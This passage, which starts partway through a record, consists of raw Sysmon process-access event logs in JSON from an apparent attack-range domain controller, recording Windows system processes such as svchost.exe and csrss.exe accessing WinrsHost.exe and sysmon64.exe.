06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001007BB0700}","TargetProcessId":"484","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5284,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001007BB0700}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001007BB0700}","TargetProcessId":"484","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5285,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5286,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5287,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5288,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5289,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5290,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5291,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
